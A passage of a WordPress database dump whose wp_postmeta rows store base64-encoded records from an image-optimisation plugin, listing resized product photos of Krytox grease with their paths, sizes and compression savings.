IjoxNDgzNTc4NzQ5LCJpZCI6OTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDk3LCJ0aW1lIjoxNDgzNTc4NzUyLCJpZCI6OTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODg3LCJ0aW1lIjoxNDgzNTc4NzU2LCJpZCI6OTg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0OTgsInRpbWUiOjE0ODM1Nzg3NTksImlkIjo5ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU4MCwidGltZSI6MTQ4MzU3ODc2MywiaWQiOjk4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzcwLCJ0aW1lIjoxNDgzNTc4NzY2LCJpZCI6OTg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3OTUsInRpbWUiOjE0ODM1Nzg3NzAsImlkIjo5ODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtZnBnLWdyZWFzZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1mcGctZ3JlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWZwZy1ncmVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjk1OSwidGltZSI6MTQ4MzU3ODc3NCwiaWQiOjk4NX1d'); 
INSERT INTO `wp_postmeta` VALUES (29852, 983, 'wpfc_optimisation_reduction', '52046'); 
INSERT INTO `wp_postmeta` VALUES (29853, 983, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDIuanBnIiwid2lkdGgiOjE1MDAsImhlaWdodCI6MTUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDIuanBnIiwicmVkdWN0aW9uIjo0NTU3NiwidGltZSI6MTQ4MzU3ODc4MSwiaWQiOiI5ODMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODc4MywiaWQiOjk4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTgwMHg4MDAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi04MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItODAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjE4NjAsInRpbWUiOjE0ODM1Nzg3ODYsImlkIjo5ODN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItNzY4eDc2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTc2OHg3NjguanBnIiwicmVkdWN0aW9uIjoxNTk0LCJ0aW1lIjoxNDgzNTc4Nzg4LCJpZCI6OTgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MjQ2LCJ0aW1lIjoxNDgzNTc4NzkwLCJpZCI6OTgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MTU1LCJ0aW1lIjoxNDgzNTc4NzkyLCJpZCI6OTgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODc5NCwiaWQiOjk4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjM5NywidGltZSI6MTQ4MzU3ODc5NywiaWQiOjk4M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6Mjg0LCJ0aW1lIjoxNDgzNTc4Nzk5LCJpZCI6OTgzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoyNDYsInRpbWUiOjE0ODM1Nzg4MDEsImlkIjo5ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjM5MSwidGltZSI6MTQ4MzU3ODgwMywiaWQiOjk4M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTQzLCJ0aW1lIjoxNDgzNTc4ODA1LCJpZCI6OTgzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ2hlbW91cnMtS3J5dG94LUdyZWFzZS0zMC1nLVN5cmluZ2UtSG9yei0zMDAtZHBpLTAwMi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NoZW1vdXJzLUtyeXRveC1HcmVhc2UtMzAtZy1TeXJpbmdlLUhvcnotMzAwLWRwaS0wMDItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DaGVtb3Vycy1Lcnl0b3gtR3JlYXNlLTMwLWctU3lyaW5nZS1Ib3J6LTMwMC1kcGktMDAyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo3NTIsInRpbWUiOjE0ODM1Nzg4MDgsImlkIjo5ODN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29854, 982, 'wpfc_optimisation_reduction', '207259'); 
INSERT INTO `wp_postmeta` VALUES (29855, 982, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi5qcGciLCJ3aWR0aCI6MTUwMCwiaGVpZ2h0IjoxNTAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYuanBnIiwicmVkdWN0aW9uIjoyMDcwNzEsInRpbWUiOjE0ODM1Nzg4MTYsImlkIjoiOTgyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Nzg4MTgsImlkIjo5ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQy0xMDY4NV9Lcnl0b3hfRlBHXzE4Mi1Hcm91cC0wNjI3MTYtODAweDgwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DLTEwNjg1X0tyeXRveF9GUEdfMTgyLUdyb3VwLTA2MjcxNi04MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0MtMTA2ODVfS3J5dG94X0ZQR18xODItR3JvdXAtMDYyNzE2LTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4ODIwLCJpZCI6OTgyfSx7ImZpbGUiOiJcL2hvb